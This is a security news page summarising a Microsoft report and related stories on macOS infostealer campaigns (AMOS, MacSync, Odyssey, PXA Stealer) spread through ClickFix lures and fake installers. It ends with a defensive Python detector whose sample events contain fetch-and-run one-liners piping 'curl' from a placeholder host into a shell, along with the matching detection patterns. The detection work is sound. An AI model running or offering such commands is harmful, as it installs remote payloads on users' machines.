Microsoft Warns of macOS Infostealer Campaigns Using ClickFix Lures, Malicious DMGs, and Python Stealers
Microsoft reported that information-stealing malware activity is expanding from Windows to macOS, driven by campaigns observed since late 2025 that rely on social engineering and cross-platform tooling. The activity includes ClickFix-style prompts and malicious DMG installers that deliver macOS-focused infostealer families such as Atomic macOS Stealer (AMOS), MacSync, and DigitStealer, with operators leveraging fileless execution, native macOS utilities, and AppleScript automation to evade defenses and automate collection.
Initial access commonly starts with malicious search ads (e.g., Google Ads) that redirect users to fake sites impersonating legitimate tools and then trick victims into running “fix” steps or installing trojanized software. The malware is assessed to target high-value data including browser credentials and session cookies, iCloud Keychain contents, crypto wallet data, and developer secrets; Microsoft also highlighted growing use of Python-based stealers distributed via phishing for rapid adaptation across heterogeneous environments, citing PXA Stealer (linked to Vietnamese-speaking actors) as an example used in late-2025 campaigns with persistence mechanisms such as registry Run keys or scheduled tasks and Telegram used for command-and-control.
Related Stories

macOS Infostealer Campaigns Using Social Engineering and Evasion Tactics
Threat actors are escalating **macOS infostealer** activity through multiple distribution and evasion techniques aimed at harvesting sensitive user data. One campaign abuses trust in legitimate AI platforms by promoting shareable *ChatGPT* and *Grok* conversation links via **Google Ads**, luring users searching for common macOS troubleshooting help into running malicious Terminal commands using the **“ClickFix”** social-engineering pattern. Executing the provided shell commands results in installation of **Atomic macOS Stealer (AMOS)**, which steals browser credentials, crypto wallet seed phrases, **Keychain** data, and personal files before exfiltrating them to attacker-controlled infrastructure. Separately, **Odyssey Stealer** intrusions against macOS have surged globally, with notable targeting reported in the U.S., France, and Spain and additional impact across Europe, the Americas, and parts of Asia and Africa. Moonlock Lab reporting indicates Odyssey is delivered through **fake software updates, cracked tools, and fraudulent apps**, and is designed to evade detection by generating a **unique fingerprint per infection**, frequently changing code structure, and using many distinct **SHA-256** variants—suggesting automated builders are being used to produce large numbers of hard-to-block samples. Collectively, the reporting highlights sustained pressure on macOS users from credential-stealing malware that blends high-trust lures with rapid variant generation to hinder traditional defenses.
1 month ago
macOS Malware Campaigns Shift Toward Infostealers and Social Engineering to Bypass Apple Protections
Threat actors are increasingly targeting macOS users with **infostealers** and distribution-as-a-service models, reflecting a broader “gold rush” in Apple-focused malware development. Reporting highlights macOS stealers targeting browser credentials and cryptocurrency assets (including seed phrases) and notes tactics to evade Apple controls such as obtaining valid Apple developer signatures to bypass *Gatekeeper*; one cited example is *MacSync* being notarized and signed under Team ID `GNJLS3UYZ4`. The same reporting describes ecosystem-scale enablement, including large-scale compromise of WordPress sites for distribution and novel command-and-control approaches such as using blockchain smart contracts (e.g., on **BNB Smart Chain**), alongside paid-traffic abuse (e.g., promoting malicious AI chat content via ads) to push stealer payloads. Separately, a Darktrace-described investigation details a **multi-stage macOS malware** campaign that prioritizes *social engineering* over exploitation to defeat Apple’s **Transparency, Consent, and Control (TCC)** privacy framework. Victims are lured via phishing to open an AppleScript masquerading as a document (`Confirmation_Token_Vesting.docx.scpt`), which displays a fake “Compatibility” error and instructs the user to launch a “Compatibility Wizard” (e.g., using a keyboard shortcut) that effectively tricks them into authorizing execution and granting access. Together, the reporting indicates macOS threats are increasingly succeeding by combining credential/crypto theft objectives with user-prompt manipulation and trust-abuse techniques rather than relying on kernel or sandbox escapes.
1 month ago
ClickFix Campaigns Deliver MacSync Infostealer to macOS Users
Researchers reported **three ClickFix campaigns** that used social engineering rather than software exploitation to infect **macOS** users with the **MacSync** infostealer. The activity evolved over several months, beginning with fake sponsored search results for an **OpenAI Atlas** browser download hosted on fraudulent pages, then shifting to malicious workflows that abused shared **ChatGPT** conversations and GitHub-themed landing pages to make the infection chain appear legitimate. In each case, victims were instructed to open **Terminal** and paste commands, allowing the malware to be installed through user action instead of a traditional exploit. The most recent campaign introduced a more advanced **MacSync** variant with **multi-stage loaders**, **dynamic AppleScript payloads**, and **in-memory execution** intended to improve evasion and persistence. Reporting indicates the later activity targeted users in **Belgium, India, and parts of North and South America**, while researchers said it remains unclear whether all three campaigns were conducted by the same threat actor. The findings underscore a broader trend of attackers adapting **ClickFix** lures for macOS, using trusted platforms, sponsored links, and fake AI-tool installers to steal credentials and other sensitive data while bypassing file-based defenses by persuading users to execute the attack themselves.
Today
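As an added illustration, not taken from any of the reports summarized above, the following Python scores constructed macOS process-start events for the paste-and-run hallmarks of the ClickFix chain these stories describe: a Terminal-spawned shell that fetches or base64-decodes a payload straight into an interpreter, and osascript `do shell script` usage with an administrator prompt. The event records, the `TERMINAL` path suffix and the regex heuristics are all assumptions made for this example.

```python
import re

# Assumed parent-image suffix for an interactive Terminal session (example assumption).
TERMINAL = "Terminal.app/Contents/MacOS/Terminal"

# Heuristic indicators (assumed for this example): each is a hallmark of a pasted
# "fix" one-liner that fetches or decodes a payload and hands it to an interpreter.
INDICATORS = {
    "download_to_shell": re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b"),
    "base64_to_shell":   re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b[^|;&]*\|\s*(?:ba|z)?sh\b"),
    "osascript_shell":   re.compile(r"\bosascript\b.*\bdo shell script\b"),
    "admin_prompt":      re.compile(r"\bwith administrator privileges\b"),
}

# Constructed sample of process-start events (parent image, child image, command line).
SAMPLE_EVENTS = [
    {"parent": "/System/Applications/Utilities/" + TERMINAL, "image": "/bin/bash",
     "cmdline": 'bash -c "echo aGVsbG8= | base64 -d | bash"'},
    {"parent": "/System/Applications/Utilities/" + TERMINAL, "image": "/bin/zsh",
     "cmdline": 'zsh -c "curl -fsSL http://example.invalid/fix.sh | bash"'},
    {"parent": "/bin/zsh", "image": "/usr/bin/osascript",
     "cmdline": "osascript -e 'do shell script \"curl -s http://example.invalid/p | sh\" "
                "with administrator privileges'"},
    {"parent": "/System/Applications/Utilities/" + TERMINAL, "image": "/bin/zsh",
     "cmdline": 'zsh -c "ls -la ~/Downloads"'},   # benign interactive command
]


def classify(event: dict) -> dict:
    """Return the indicators hit by one process-start event plus a verdict."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(event["cmdline"])]
    from_terminal = event["parent"].endswith(TERMINAL)
    # A pasted one-liner is the ClickFix hallmark: interactive Terminal parent plus a
    # fetch/decode-and-execute command. osascript-driven shell is flagged regardless of parent.
    suspicious = bool(hits) and (from_terminal or "osascript_shell" in hits)
    return {"indicators": hits, "from_terminal": from_terminal, "suspicious": suspicious}


def triage(events: list) -> list:
    """Return (index, classification) for every event judged suspicious."""
    flagged = []
    for i, event in enumerate(events):
        verdict = classify(event)
        if verdict["suspicious"]:
            flagged.append((i, verdict))
    return flagged


if __name__ == "__main__":
    for idx, verdict in triage(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["image"], verdict["indicators"])
```

In a real deployment the same logic would run over endpoint telemetry (process parent, image and command line) rather than the embedded sample.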